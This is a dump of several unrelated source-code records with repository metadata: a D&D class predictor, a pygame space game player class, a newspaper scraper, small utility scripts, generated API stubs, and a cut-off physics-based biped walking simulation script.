| 2023-02-04T02:29:01.207912
| 2020-12-27T13:30:38
| 2020-12-27T13:30:38
| 318,752,729
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,100
|
py
|
import pandas as pd
import numpy as np
import argparse
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
default_dataset = 'https://raw.githubusercontent.com/oganm/dndstats/master/docs/charTable.tsv'
class DNDClassPredictor:
"""
This class use machine-learning in order to make guesses on good class choices based on a choosen ability score
"""
def __init__(self, dataset = None):
"""
Initiate the class, either with a given dataset, or it will pull from the default dataset.
"""
#Get data from dataset
if dataset is None:
self.dataset = pd.read_csv(default_dataset, sep='\t')
else:
self.dataset = dataset
self.__features = self.dataset[['Str','Dex','Con','Wis','Int','Cha']]
targets = self.dataset[['justClass']]
#Get List of single class strings, not including any multiclasses
classes_list = targets.drop_duplicates()
single_class_list = [c for c in classes_list['justClass'] if '|' not in c]
single_class_list.sort()
#Replace all class strings with number
self.__classes_dict = {}
for idx in range(len(single_class_list)):
dnd_class = single_class_list[idx]
self.__classes_dict[dnd_class] = idx
numeric_targets = targets.replace(self.__classes_dict)
targets = numeric_targets
#Removing all multiclass strings, that was not removed above, and replace with single value
numeric_targets = targets.replace("^\w.*$", len(self.__classes_dict), regex=True)
self.__targets = numeric_targets
#Finalizing the dict, and adding an opposite dict for classes
self.__classes_dict['Multiclassing'] = len(self.__classes_dict)
self.__classes_numeric_dict = {y:x for x,y in self.__classes_dict.items()}
#Using another class method to make a fit a model for prediction, and check if the model has good test results
min_test_score = 0.4
test_score = 0
found_good_model = False
for num in (range(1,1001)):
model = self.fit_class_model()
if (model["test_score"] >= min_test_score):
found_good_model = True
self.__model = model["model"]
break
elif (model["test_score"] > test_score):
self.__model = model["model"]
test_score = model["test_score"]
if(not found_good_model):
print('WARNING: The model could not achive a good test score, and is only', test_score*100, 'accurate in test')
def fit_class_model(self):
"""
Method to get dict containing a model fit with data from the dataset, along with a score for the model
"""
#Setting up the model, and testing with classification
x_train,x_test,y_train,y_test = train_test_split(self.__features,self.__targets,test_size=0.3)
model = DecisionTreeClassifier()
model.fit(x_train, y_train)
#Display the score for the model from the dataset
test_score = model.score(x_test, y_test)
return {"model": model, "test_score": test_score}
#print('Train Score:', self.__model.score(x_train, y_train))
#print('Testing Score', self.__model.score(x_test, y_test))
def predict_class_from_ability_scores(self, ability_scores):
"""
Uses the class model to try and predict a good class choice for a given ability score, based on the dataset.
"""
numeric_result = self.__model.predict([ability_scores])[0]
result = self.__classes_numeric_dict[numeric_result]
return "The given ability scores would work well with a class choice of: " + result
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='This program allows you to input 6 ability scores for dungeons and dragons 5th edition, and get a suitable class for those ability scores as output')
parser.add_argument('-ab','--abilityScores', nargs='+', help='<Required> Give a list of the ability scores in the following order: Strength(Str) Dexterity(Dex) Constitution(Con) Intelligence(Int) Wisdom(Wis) Charisma(Cha)', required=True)
args = parser.parse_args()
input = args.abilityScores
if(len(input) == 6):
try:
ability_scores = []
for score in input:
ability_scores.append(int(score))
classPredictor = DNDClassPredictor()
result = classPredictor.predict_class_from_ability_scores(ability_scores)
msg = result
print(msg)
except ValueError:
print("One or more of the ability scores could not be read as a numbers")
else:
print("The given input needs exactly 6 arguments, seperated by space, representing, in order: Strength(Str) Dexterity(Dex) Constitution(Con) Intelligence(Int) Wisdom(Wis) Charisma(Cha)")
|
[
"Michael12.korsgaard@gmail.com"
] |
Michael12.korsgaard@gmail.com
|
54233aff7a165d2f58face68023c6e17308bd0a4
|
04568fae7b4923656043a2ff08e715a5898081f1
|
/space_rocks/player.py
|
1a6e14cd6a339ab61bc7bbc497c2d0ee238cde06
|
[] |
no_license
|
balanikas/space-rocks
|
5c32e9a4f3579836af43439df71596a8a6ade5ec
|
d3aba42b74a05b489fcb9349ae5015ca34d23419
|
refs/heads/master
| 2023-05-03T11:04:29.764783
| 2021-05-15T16:26:06
| 2021-05-15T19:47:58
| 350,666,293
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,547
|
py
|
from enum import Enum
from typing import NamedTuple, Callable, Any
import pygame
from pygame import Vector2
from pygame.surface import Surface
import space_rocks.animation as anim
import space_rocks.audio as sounds
import space_rocks.graphics as gfx
from space_rocks.geometry import Geometry
from space_rocks.models import Bullet, BulletProperties, GameObject
from space_rocks.utils import (
bounce_other,
get_blit_position,
scale_and_rotate,
bounce_edge,
get_resize_factor,
)
from space_rocks.window import window
class ActiveWeapon(Enum):
PRIMARY = 1
SECONDARY = 2
class PlayerProperties(NamedTuple):
damage: float
armor: float
maneuverability: float
acceleration: float
sound_on_impact: str
image_name: str
anim_on_destroy: str
primary_weapon: BulletProperties
secondary_weapon: BulletProperties
def validate(self):
assert self.damage > 0
assert self.armor > 0
assert self.maneuverability > 0
assert self.acceleration > 0
class Player(GameObject):
UP = Vector2(0, -1)
def __init__(
self,
properties: PlayerProperties,
position: Vector2,
create_bullet_callback: Callable[[Any], None],
):
self._p = properties
self._create_bullet_callback = create_bullet_callback
self._direction = self.UP
self._active_weapon = ActiveWeapon.PRIMARY
self._last_shot = 0
self._armor = self._p.armor
self._angle = 0.0
super().__init__(
position,
gfx.get(self._p.image_name, resize=get_resize_factor(0.1)),
Vector2(0),
)
self._rotated_image = self.image
@property
def damage(self):
return self._p.damage
@property
def armor(self):
return self._armor
@property
def direction(self):
return self._direction
def resize(self):
self.image = gfx.get(self._p.image_name, resize=get_resize_factor(0.1))
self.reposition()
def rotate(self, clockwise: bool = True):
sign = 1 if clockwise else -1
angle = self._p.maneuverability * sign
self._direction = self._direction.rotate(angle)
def move(self, surface: Surface):
self.geometry = bounce_edge(surface, 50, 0.6, self.geometry)
self.rect.center = (
int(self.geometry.position.x),
int(self.geometry.position.y),
)
def draw(self, surface: Surface):
if self.armor <= 0:
return
angle = self._direction.angle_to(self.UP)
if angle != self._angle:
rotated_surface = scale_and_rotate(self.image, angle, 1)
self._rotated_image = rotated_surface
self._angle = angle
else:
rotated_surface = self._rotated_image
blit_position = get_blit_position(rotated_surface, self.geometry.position)
surface.blit(rotated_surface, blit_position)
def accelerate(self):
self.geometry = self.geometry.update_vel(
self.geometry.velocity + (self._direction * self._p.acceleration)
)
def switch_weapon(self):
if self._active_weapon == ActiveWeapon.PRIMARY:
self._active_weapon = ActiveWeapon.SECONDARY
else:
self._active_weapon = ActiveWeapon.PRIMARY
sounds.play("change_weapon")
def shoot(self):
w = (
self._p.primary_weapon
if self._active_weapon == ActiveWeapon.PRIMARY
else self._p.secondary_weapon
)
if pygame.time.get_ticks() - self._last_shot < w.reload:
return
self._last_shot = pygame.time.get_ticks()
weapon_velocity = self._direction * w.speed
weapon_velocity = Vector2(
weapon_velocity.x * window.factor.x, weapon_velocity.y * window.factor.y
)
w = Bullet(w, self.geometry.position, weapon_velocity)
self._create_bullet_callback(w)
def hit(self, other: Geometry, damage: float):
self._armor -= damage
if self._armor > 0:
sounds.play(self._p.sound_on_impact)
self.geometry = bounce_other(self.geometry, other)
else:
sounds.play(self._p.sound_on_impact)
def get_impact_animation(self) -> anim.Animation:
return anim.get(
self._p.anim_on_destroy, self.geometry.position, resize=(200, 200)
)
@property
def active_weapon(self) -> ActiveWeapon:
return self._active_weapon
|
[
"c_balanikas@hotmail.com"
] |
c_balanikas@hotmail.com
|
da106758572a7ac440addece5128e3cf9cf417b4
|
4c0a2efb54a87e8419c530e49173484660021c16
|
/src/demo_hic_et_nunc/types/hen_minter/parameter/swap.py
|
7c54aa138c71b7a9035676794c8af5b23cf473d0
|
[
"MIT"
] |
permissive
|
jellybazil/dipdup-py
|
7cc6641b7a25379034be401626d91d17d2493f43
|
950b086effbfce78080461ecc2f959ba7a8ba998
|
refs/heads/master
| 2023-08-12T06:50:01.445161
| 2021-10-16T20:52:29
| 2021-10-16T20:52:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 279
|
py
|
# generated by datamodel-codegen:
# filename: swap.json
from __future__ import annotations
from pydantic import BaseModel, Extra
class SwapParameter(BaseModel):
class Config:
extra = Extra.forbid
objkt_amount: str
objkt_id: str
xtz_per_objkt: str
|
[
"noreply@github.com"
] |
noreply@github.com
|
53977bf089d82553874f17592e4816552cc6084d
|
c9731d11c7e0a363b98849a95a43e28114375924
|
/Medium/ArmstrongNumber.py
|
f4d036541234f0dc70beaaefe4694cc40b35741a
|
[] |
no_license
|
kanuos/solving-https-github.com-ProgrammingHero1-100-plus-python-coding-problems-with-solutions
|
009103de05d5a6fa8ab072f75d1080c207b1b57d
|
1b37942e83118bba26c490dfb79e7b99d006961c
|
refs/heads/main
| 2023-04-07T00:45:00.907554
| 2021-04-14T22:07:32
| 2021-04-14T22:07:32
| 356,587,876
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,122
|
py
|
# Armstrong number.
# A number is an Armstrong Number or narcissistic number
# if it is equal to the sum of its own digits raised to the power of the number of digits.
def is_armstrong(number: int) -> bool:
sum_of_cubes = 0
temp = number
while temp > 0:
sum_of_cubes += (temp % 10) ** 3
temp //= 10
return sum_of_cubes == number
def nearest_armstrong(number):
pre = 0
print("Checking for nearest Armstrong Numbers. Please wait...")
for i in range(number, 1, -1):
if is_armstrong(i):
pre = i
break
while True:
number += 1
if is_armstrong(number):
post = number
break
print("Found nearest Armstrong Numbers")
return pre, post
try:
num = int(input("Enter a number : "))
if is_armstrong(num):
print(f"{num} is an Armstrong Number")
else:
print(f"{num} is not an Armstrong Number")
before, after = nearest_armstrong(num)
print(f"The nearest Armstrong Numbers of {num} are {before} and {after}")
except ValueError:
print("Input must be a number")
|
[
"sounakmukherjee@ymail.com"
] |
sounakmukherjee@ymail.com
|
f8f2a2c16488ab7b2db5c75b3e3384fe28779156
|
c5458f2d53d02cb2967434122183ed064e1929f9
|
/sdks/python/test/test_generate_commitments_request.py
|
8c5a96d5277ec4d96a679c0c58dcd09553377df4
|
[] |
no_license
|
ross-weir/ergo-node-api-sdks
|
fd7a32f79784dbd336ef6ddb9702b9dd9a964e75
|
9935ef703b14760854b24045c1307602b282c4fb
|
refs/heads/main
| 2023-08-24T05:12:30.761145
| 2021-11-08T10:28:10
| 2021-11-08T10:28:10
| 425,785,912
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
"""
Ergo Node API
API docs for Ergo Node. Models are shared between all Ergo products # noqa: E501
The version of the OpenAPI document: 4.0.15
Contact: ergoplatform@protonmail.com
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import openapi_client
from openapi_client.model.generate_commitments_request_secrets import GenerateCommitmentsRequestSecrets
from openapi_client.model.unsigned_ergo_transaction import UnsignedErgoTransaction
globals()['GenerateCommitmentsRequestSecrets'] = GenerateCommitmentsRequestSecrets
globals()['UnsignedErgoTransaction'] = UnsignedErgoTransaction
from openapi_client.model.generate_commitments_request import GenerateCommitmentsRequest
class TestGenerateCommitmentsRequest(unittest.TestCase):
"""GenerateCommitmentsRequest unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGenerateCommitmentsRequest(self):
"""Test GenerateCommitmentsRequest"""
# FIXME: construct object with mandatory attributes with example values
# model = GenerateCommitmentsRequest() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"29697678+ross-weir@users.noreply.github.com"
] |
29697678+ross-weir@users.noreply.github.com
|
2aa099e77ec976eea8a2ce7424afac7d5124999a
|
b0c2a8c77fc0e025690e59f990950b6eb347c4c3
|
/corpus_builder/spiders/newspaper/janakantha.py
|
f0a39957ada5c7a106bab473fa6104a3258d95fb
|
[
"MIT"
] |
permissive
|
ibraheem-moosa/corpus-builder
|
1b31cbc501026436e5ebde2e363379b6fc094dd0
|
5f09835f9aa62abb5f891c4d3896206eedd9fe12
|
refs/heads/master
| 2020-08-06T21:39:31.700339
| 2018-08-24T14:00:18
| 2018-08-24T14:00:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,923
|
py
|
# -*- coding: utf-8 -*-
import datetime
import urlparse
import scrapy
from corpus_builder.templates.spider import CommonSpider
class JanakanthaSpider(CommonSpider):
name = "janakantha"
allowed_domains = ["dailyjanakantha.com"]
base_url = 'https://www.dailyjanakantha.com'
start_request_url = base_url
content_body = {
'css': 'p.artDetails *::text'
}
allowed_configurations = [
['start_date'],
['start_date', 'end_date'],
['category', 'start_date'],
['category', 'start_date', 'end_date'],
]
def request_index(self, response):
menu_links = [urlparse.urlparse(x.strip()).path.split('/')[-1] \
for x in response.css('nav.menu a::attr("href")').extract()]
categories = [x for x in menu_links if (not x == "" and not x == "#")]
if self.category is not None:
if self.category in categories:
categories = [self.category]
else:
raise ValueError('invalid category slug. available slugs: %s' % ", ".join(categories))
date_processing = self.start_date
while date_processing <= self.end_date:
for category in categories:
# https://www.dailyjanakantha.com/frontpage/date/2016-06-01
url = self.base_url + '/{0}/date/{1}'.format(
category,
date_processing.strftime('%Y-%m-%d')
)
yield scrapy.Request(url, callback=self.extract_news_category)
date_processing += datetime.timedelta(days=1)
def extract_news_category(self, response):
news_links = list(set(response.xpath('//div[@class="content"]//a').extract()))
for link in news_links:
if not link[:4] == 'http':
link = self.base_url + link
yield scrapy.Request(link, callback=self.parse_content)
|
[
"aniruddha@adhikary.net"
] |
aniruddha@adhikary.net
|
ced957c5f5648e9b066bb688b28dddf47767fc8e
|
a808067d0becc34f4f5bf49ca80bfdeaa5f52d37
|
/utils/readYaml.py
|
9106be7525b8aae495bea5b8801d40c7d383cc45
|
[] |
no_license
|
ir3lia/interfaceAutoTest
|
08595e46daa9cbe7e2f1f7511c864726b26ca6cd
|
70f6cc8d50680b17bad686f45b36f9f36e0a1ac9
|
refs/heads/master
| 2023-02-01T19:26:59.899806
| 2020-12-16T09:46:02
| 2020-12-16T09:46:02
| 321,935,871
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,108
|
py
|
import yaml
def get_test_data(test_data_path):
case = [] # 存储测试用例名称
http = [] # 存储请求对象
expected = [] # 存储预期结果
with open(test_data_path) as f:
dat = yaml.load(f.read(), Loader=yaml.SafeLoader)
test = dat['tests']
for td in test:
case.append(td.get('case', ''))
http.append(td.get('http', {}))
expected.append(td.get('expected', {}))
parameters = zip(case,http, expected)
return case, parameters
def get_config(test_host_path,type):
configs = [] # 存储预期结果
with open(test_host_path) as f:
dat = yaml.load(f.read(), Loader=yaml.SafeLoader)
config = dat['config']
for td in config:
configs.append(td.get(type, {}))
return configs
def get_apiPath(test_api_path):
apipaths = [] # 存储预期结果
with open(test_api_path) as f:
dat = yaml.load(f.read(), Loader=yaml.SafeLoader)
apiPath = dat['apiPath']
for td in apiPath:
apipaths.append(td.get('paths', {}))
return apipaths
|
[
"“13869517521@163.com"
] |
“13869517521@163.com
|
fe54aba99af7334fa816a9c0282b522dea6e026c
|
8d55d41a4f5c0b89331cac714c1525e9581d9720
|
/WalkingFoot/main_RevisionExamples2.py
|
18a2303fe1a6b91bde48556986a9ae98c1b31b48
|
[
"Apache-2.0"
] |
permissive
|
hpgit/HumanFoot
|
8cf35ceeeb35a0371e03eaf19d6da58dc01487eb
|
f9a1a341b7c43747bddcd5584b8c98a0d1ac2973
|
refs/heads/master
| 2022-04-13T23:38:19.072203
| 2019-12-06T06:36:10
| 2019-12-06T06:36:10
| 41,348,141
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 43,724
|
py
|
from fltk import *
import copy, os.path, cPickle, time
import numpy as np
import sys
if '../PyCommon/modules' not in sys.path:
sys.path.append('../PyCommon/modules')
import Math.mmMath as mm
import Math.csMath as cm
import Math.ysFunctionGraph as yfg
import Renderer.ysRenderer as yr
import Renderer.csVpRenderer as cvr
import Simulator.csVpWorld as cvw
import Simulator.csVpModel as cvm
import Simulator.ysVpUtil as yvu
import GUI.ysSimpleViewer as ysv
import GUI.ysMultiViewer as ymv
import ArticulatedBody.ysControl as yct
import ArticulatedBody.ysReferencePoints as yrp
import Motion.ysMotionAnalysis as yma
import Motion.ysBipedAnalysis as yba
import Motion.ysMotion as ym
import Motion.ysMotionBlend as ymb
import Motion.ysMotionExtend as ymt
import Motion.ysSkeletonEdit as yhe
import Motion.mmAnalyticIK as aik
import Util.ysMatplotEx as ymp
import Resource.ysMotionLoader as yf
import Simulator.ysPhysConfig as ypc
MOTION_COLOR = (213,111,162)
CHARACTER_COLOR = (20,166,188)
#BOX_COLOR = (255,204,153)
BOX_COLOR = (235,184,133)
def push_simbicon_mass():
# Trunk 29.27
# Head 5.89
# Pelvis 16.61
# Thigh 8.35
# Shank 4.16
# Foot 1.34
# Arm 2.79
# Forearm 1.21
# Hand 0.55
class ForceInfo:
def __init__(self, startFrame, duration, force):
self.startFrame = startFrame # frame
self.duration = duration # sec
self.force = force # Newton
self.targetBody = None
#===============================================================================
# load motion
#===============================================================================
MULTI_VIEWER = False
CAMERA_TRACKING = True
TORQUE_PLOT = False
# global parameters
Kt = 60.; Dt = 2*(Kt**.5)
Ks = 4000.; Ds = 2*(Ks**.5)
K_stb_vel = .1
mu = 2.
# constaants
c_min_contact_vel = 100.
# c_min_contact_vel = 2.
c_min_contact_time = .7
c_landing_duration = .2
c_taking_duration = .3
# c_swf_mid_offset = .0
c_swf_mid_offset = .02
c_swf_stability = .5
c_locking_vel = .05
# c_swf_offset = .0
c_swf_offset = .01
# c_swf_offset = .005
K_stp_pos = 0.
# c5 = .5; c6 = .01
c5 = .5; c6 = .02
# c5 = .5; c6 = .05
# c5 = 1.; c6 = .05
# c5 = .0; c6 = .0
K_stb_vel = .1
K_stb_pos = .1
OLD_SWING_HEIGHT = False
# OLD_SWING_HEIGHT = True
HIGHER_OFFSET = True
# HIGHER_OFFSET = False
dir = './ppmotion/'
# max push
# forceInfos = []
# maximum
# forceInfos = [ForceInfo(4*i*30, .4, (160,0,0)) for i in range(2,12)]
# forceInfos = [ForceInfo(4*i*30, .4, (-130,0,0)) for i in range(2,12)]
# forceInfos = [ForceInfo(4*i*30, .4, (0,0,80)) for i in range(2,12)]
forceInfos = [ForceInfo(4*i*30+1, .4, (0,0,-105)) for i in range(2,12)]
# # maximum with more checking
# forceInfos = [ForceInfo(4*i*30, .4, (145,0,0)) for i in range(2,12)]
# forceInfos = [ForceInfo(4*i*30+1, .4, (-120,0,0)) for i in range(2,12)]
# forceInfos = [ForceInfo(4*i*30+1, .4, (0,0,80)) for i in range(2,12)]
# forceInfos = [ForceInfo(4*i*30, .4, (0,0,-105)) for i in range(2,12)]
# # for video
# forceInfos = [ForceInfo(4*i*30+2, .4, (160,0,0)) for i in range(2,4)] \
# + [ForceInfo(4*i*30+2, .4, (0,0,-105)) for i in range(4,6)] \
# + [ForceInfo(4*i*30+2, .4, (-130,0,0)) for i in range(6,8)] \
# + [ForceInfo(4*i*30+2, .4, (0,0,80)) for i in range(8,10)]
# Kt = 40.; Dt = 2*(Kt**.5)
# Ks = 3000.; Ds = 2*(Ks**.5)
# mu = 1.
# c_swf_mid_offset = .04
# K_swp_vel_sag = .0; K_swp_vel_sag_faster = .0;
# K_swp_pos_sag = 1.5; K_swp_pos_sag_faster = .1;
# K_swp_vel_cor = .25; K_swp_pos_cor = .3
# K_stp_pos = 0.
# K_stb_vel = .02
# K_stb_pos = .15
Kt = 40.; Dt = 2*(Kt**.5)
Ks = 3000.; Ds = 2*(Ks**.5)
mu = 1.5
c_swf_mid_offset = .04
K_swp_vel_sag = .05; K_swp_vel_sag_faster = .0;
K_swp_pos_sag = 1.7; K_swp_pos_sag_faster = .1;
K_swp_vel_cor = .25; K_swp_pos_cor = .3
# K_stb_vel = .02
# K_stb_pos = .15
filename = 'wd2_WalkSameSame01_REPEATED.bvh'
motion_ori = yf.readBvhFile(dir+filename)
frameTime = 1/motion_ori.fps
if 'REPEATED' in filename:
REPEATED = True
CAMERA_TRACKING = True
else:
REPEATED = False
#===============================================================================
# options
#===============================================================================
SEGMENT_EDITING = True
STANCE_FOOT_STABILIZE = True
MATCH_STANCE_LEG = True
SWING_FOOT_PLACEMENT = True
SWING_FOOT_HEIGHT = True
if '_FOOT' in filename:
SWING_FOOT_ORIENTATION = True
else:
SWING_FOOT_ORIENTATION = False
STANCE_FOOT_PUSH = True
STANCE_FOOT_BALANCING = True
stitch_func = lambda x : 1. - yfg.hermite2nd(x)
stf_stabilize_func = yfg.concatenate([yfg.hermite2nd, yfg.one], [c_landing_duration])
match_stl_func = yfg.hermite2nd
# match_stl_func_y = yfg.hermite2nd
swf_placement_func = yfg.hermite2nd
swf_height_func = yfg.hermite2nd
swf_height_sine_func = yfg.sine
# stf_balancing_func = yfg.concatenate([yfg.hermite2nd, yfg.one], [c_landing_duration])
stf_balancing_func = yfg.hermite2nd
#===============================================================================
# initialize character
#===============================================================================
# mcfgfile = open(dir + 'mcfg', 'r')
mcfgfile = open('mcfg_simbicon', 'r')
mcfg = cPickle.load(mcfgfile)
mcfgfile.close()
wcfg = ypc.WorldConfig()
wcfg.planeHeight = 0.
wcfg.useDefaultContactModel = False
wcfg.lockingVel = c_locking_vel
stepsPerFrame = 30
wcfg.timeStep = (frameTime)/stepsPerFrame
vpWorld = cvw.VpWorld(wcfg)
motionModel = cvm.VpMotionModel(vpWorld, motion_ori[0], mcfg)
controlModel = cvm.VpControlModel(vpWorld, motion_ori[0], mcfg)
vpWorld.initialize()
print controlModel
motionModel.recordVelByFiniteDiff()
controlModel.initializeHybridDynamics()
#===============================================================================
# load segment info
#===============================================================================
skeleton = motion_ori[0].skeleton
segname = os.path.splitext(filename)[0]+'.seg'
segfile = open(dir+segname, 'r')
seginfo = cPickle.load(segfile)
segfile.close()
intervals = [info['interval'] for info in seginfo]
states = [info['state'] for info in seginfo]
temp_motion = copy.deepcopy(motion_ori)
segments = yma.splitMotionIntoSegments(temp_motion, intervals)
print len(intervals), 'segments'
for i in range(len(intervals)):
print '%dth'%i, yba.GaitState.text[states[i]], intervals[i], ',',
print
motion_seg_orig = ym.JointMotion()
motion_seg_orig += segments[0]
motion_seg = ym.JointMotion()
motion_seg += segments[0]
motion_stitch = ym.JointMotion()
motion_stitch += segments[0]
motion_stf_stabilize = ym.JointMotion()
motion_match_stl = ym.JointMotion()
motion_swf_placement = ym.JointMotion()
motion_swf_height = ym.JointMotion()
motion_swf_orientation = ym.JointMotion()
motion_stf_balancing = ym.JointMotion()
motion_stf_push = ym.JointMotion()
motion_control = ym.JointMotion()
motion_debug1 = ym.JointMotion()
motion_debug2 = ym.JointMotion()
motion_debug3 = ym.JointMotion()
P = ym.JointMotion()
P_hat = ym.JointMotion()
M_tc = ym.JointMotion()
M_hat_tc_1 = ym.JointMotion()
#===============================================================================
# loop variable
#===============================================================================
seg_index = [0]
acc_offset = [0]
extended = [False]
prev_R_swp = [None]
stl_y_limit_num = [0]
stl_xz_limit_num = [0]
avg_dCM = [mm.O_Vec3()]
# avg_stf_v = [mm.O_Vec3()]
# avg_stf_av = [mm.O_Vec3()]
# stf_push_func = [yfg.zero]
step_length_cur = [0.]
step_length_tar = [0.]
step_axis = [mm.O_Vec3()]
#===============================================================================
# information
#===============================================================================
bodyIDsToCheck = range(vpWorld.getBodyNum())
mus = [mu]*len(bodyIDsToCheck)
bodyMasses = controlModel.getBodyMasses()
totalMass = controlModel.getTotalMass()
lID = controlModel.name2id('LeftFoot'); rID = controlModel.name2id('RightFoot')
lUpLeg = skeleton.getJointIndex('LeftUpLeg');rUpLeg = skeleton.getJointIndex('RightUpLeg')
lKnee = skeleton.getJointIndex('LeftLeg'); rKnee = skeleton.getJointIndex('RightLeg')
lFoot = skeleton.getJointIndex('LeftFoot'); rFoot = skeleton.getJointIndex('RightFoot')
spine = skeleton.getJointIndex('Spine')
uppers = [skeleton.getJointIndex(name) for name in ['Hips', 'Spine', 'Spine1', 'LeftArm', 'LeftForeArm', 'RightArm', 'RightForeArm']]
upperMass = sum([bodyMasses[i] for i in uppers])
lLegs = [skeleton.getJointIndex(name) for name in ['LeftUpLeg', 'LeftLeg', 'LeftFoot']]
rLegs = [skeleton.getJointIndex(name) for name in ['RightUpLeg', 'RightLeg', 'RightFoot']]
allJoints = set(range(skeleton.getJointNum()))
halfFootHeight = controlModel.getBodyShape(lFoot)[1] / 2.
for fi in forceInfos:
fi.targetBody = spine
#===========================================================================
# data collection
#===========================================================================
rhip_torques = []
rknee_torques = []
rankle_torques = []
#===============================================================================
# rendering
#===============================================================================
rd_CM = [None]; rd_CP = [None]; rd_CMP = [None]
rd_forces = [None]; rd_force_points = [None]
rd_torques = []; rd_joint_positions = []
rd_point1 = [None]
rd_point2 = [None]
rd_vec1 = [None]; rd_vecori1 = [None]
rd_vec2 = [None]; rd_vecori2 = [None]
rd_frame1 = [None]
rd_frame2 = [None]
if MULTI_VIEWER:
viewer = ymv.MultiViewer(800, 655, True, wheelWork=True)
# viewer = ymv.MultiViewer(1600, 1255)
viewer.setRenderers1([cvr.VpModelRenderer(motionModel, MOTION_COLOR, yr.POLYGON_FILL)])
viewer.setRenderers2([cvr.VpModelRenderer(controlModel, CHARACTER_COLOR, yr.POLYGON_FILL),
yr.ForcesRenderer(rd_forces, rd_force_points, (255,0,0), ratio=.01, lineWidth=.04, fromPoint=False)])
# viewer.glWindow2.groundOffset[0] -= 10
viewer.glWindow2.groundSize = 100
else:
viewer = ysv.SimpleViewer()
# viewer.record(False)
# viewer.doc.addRenderer('motionModel', cvr.VpModelRenderer(motionModel, (0,150,255), yr.POLYGON_LINE))
viewer.doc.addRenderer('controlModel', cvr.VpModelRenderer(controlModel, (200,200,200), yr.POLYGON_LINE))
# viewer.doc.addObject('motion_ori', motion_ori)
# viewer.doc.addRenderer('motion_ori', yr.JointMotionRenderer(motion_ori, (0,100,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_seg_orig', yr.JointMotionRenderer(motion_seg_orig, (0,100,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_seg', yr.JointMotionRenderer(motion_seg, (0,150,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_stitch', yr.JointMotionRenderer(motion_stitch, (0,255,200), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_stf_stabilize', yr.JointMotionRenderer(motion_stf_stabilize, (255,0,0), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_match_stl', yr.JointMotionRenderer(motion_match_stl, (255,200,0), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_swf_placement', yr.JointMotionRenderer(motion_swf_placement, (255,100,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_swf_height', yr.JointMotionRenderer(motion_swf_height, (50,255,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_swf_orientation', yr.JointMotionRenderer(motion_swf_orientation, (255,100,0), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_stf_push', yr.JointMotionRenderer(motion_stf_push, (50,255,200), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_stf_balancing', yr.JointMotionRenderer(motion_stf_balancing, (255,100,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_control', yr.JointMotionRenderer(motion_control, (255,0,0), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_debug1', yr.JointMotionRenderer(motion_debug1, (0,255,0), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_debug2', yr.JointMotionRenderer(motion_debug2, (255,0,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_debug3', yr.JointMotionRenderer(motion_debug3, (255,255,0), yr.LINK_BONE))
# viewer.doc.addRenderer('M_tc', yr.JointMotionRenderer(M_tc, (255,255,0), yr.LINK_BONE))
# viewer.doc.addRenderer('P_hat', yr.JointMotionRenderer(P_hat, (255,255,0), yr.LINK_BONE))
# viewer.doc.addRenderer('P', yr.JointMotionRenderer(P, (255,255,0), yr.LINK_BONE))
# viewer.doc.addRenderer('M_hat_tc_1', yr.JointMotionRenderer(M_hat_tc_1, (255,255,0), yr.LINK_BONE))
# viewer.doc.addRenderer('rd_CM', yr.PointsRenderer(rd_CM, (255,255,0)))
# viewer.doc.addRenderer('rd_CP', yr.PointsRenderer(rd_CP, (255,0,0)))
# viewer.doc.addRenderer('rd_CMP', yr.PointsRenderer(rd_CMP, (0,255,0)))
viewer.doc.addRenderer('forces', yr.ForcesRenderer(rd_forces, rd_force_points, (255,0,0), ratio=.01, lineWidth=.04, fromPoint=False))
# viewer.doc.addRenderer('torques', yr.VectorsRenderer(rd_torques, rd_joint_positions, (255,0,0)))
# viewer.doc.addRenderer('rd_point1', yr.PointsRenderer(rd_point1, (0,255,0)))
# viewer.doc.addRenderer('rd_point2', yr.PointsRenderer(rd_point2, (255,0,0)))
# viewer.doc.addRenderer('rd_vec1', yr.VectorsRenderer(rd_vec1, rd_vecori1, (255,0,0)))
# viewer.doc.addRenderer('rd_vec2', yr.VectorsRenderer(rd_vec2, rd_vecori2, (0,255,0)))
# viewer.doc.addRenderer('rd_frame1', yr.FramesRenderer(rd_frame1, (0,200,200)))
# viewer.doc.addRenderer('rd_frame2', yr.FramesRenderer(rd_frame2, (200,200,0)))
# viewer.setMaxFrame(len(motion_ori)-1)
if not REPEATED:
viewer.setMaxFrame(len(motion_ori)-1)
else:
viewer.setMaxFrame(1440)
if CAMERA_TRACKING:
if MULTI_VIEWER:
cameraTargets1 = [None] * (viewer.getMaxFrame()+1)
cameraTargets2 = [None] * (viewer.getMaxFrame()+1)
else:
cameraTargets = [None] * (viewer.getMaxFrame()+1)
if TORQUE_PLOT:
rhip_torques = [0.]*viewer.getMaxFrame()
rknee_torques = [0.]*viewer.getMaxFrame()
rankle_torques = [0.]*viewer.getMaxFrame()
pt = [0.]
def postFrameCallback_Always(frame):
if frame==1: pt[0] = time.time()
